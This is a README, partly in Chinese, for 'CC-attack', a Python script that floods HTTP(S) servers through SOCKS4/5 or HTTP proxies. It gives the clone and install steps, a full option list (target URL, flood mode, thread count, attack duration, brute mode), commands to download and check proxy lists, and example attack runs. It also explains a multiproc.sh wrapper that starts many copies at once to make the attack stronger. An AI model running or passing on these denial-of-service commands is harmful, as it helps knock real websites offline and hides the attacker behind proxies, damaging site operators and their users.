使用 socks4/5 或 http 代理攻击 http(s) 服务器的脚本。
- 添加了对 HTTP 代理的支持
- 添加了更多代理 api 以供下载
- 使用 Python3
- 添加了更多类似人类的选项
- Http Get/Head/Post/Slow Flood
- 随机 Http 标头/数据
- Socks4/5 代理下载器
- Socks4/5 代理检查器
- 自定义 Cookie
- 自定义帖子数据
- 支持袜子4/5
在 vps 上使用 multiproc.sh 和 socks4
pip3 install requests pysocks
git clone https://github.com/Leeon123/CC-attack.git
cd CC-attack
python3 cc.py <arguments>
=============== CC-attack help list ===============
-h/help | showing this message
-url | set target url
-m/mode | set program mode
-data | set post data path (only works on post mode)
| (Example: -data data.json)
-cookies | set cookies (Example: 'id:xxx;ua:xxx')
-v | set proxy type (4/5/http, default:5)
-t | set threads number (default:800)
-f | set proxies file (default:proxy.txt)
-b | enable/disable brute mode
| Enable=1 Disable=0 (default:0)
-s | set attack time(default:60)
-down | download proxies
-check | check proxies
将 socks5 代理下载为 proxy.txt:
python3 cc.py -down -f proxy.txt -v 5
使用自定义代理列表(socks4.txt)攻击目标 30 秒:
python3 cc.py -url http://websitet.com -f socks4.txt -v 4 -s 30
multiproc.sh 的使用
This script is using for increasing the performance of cc.py.
Due to the suck performance of python since it has a GIL lock,
And I am lazy to make a multiprocess version.
There is a option for linux user to increase their performance of cc.py
This script basicly just run cc.py multiple times to make it "multi-processing"
First, put this script and cc.py in the same folder.
Then prepare the proxies list by yourself or just run "python3 cc.py -down -v 4" (-v socks version)
After that, change the number of process.
At last, change atk_cmd to your command and run the script by "bash multiproc.sh"
multiproc.sh 的示例设置(-v socks 版本)(-s 攻击时间)
atk_cmd="python3 cc.py -url http://target.com -v 4 -s 60"
#number of process that you want
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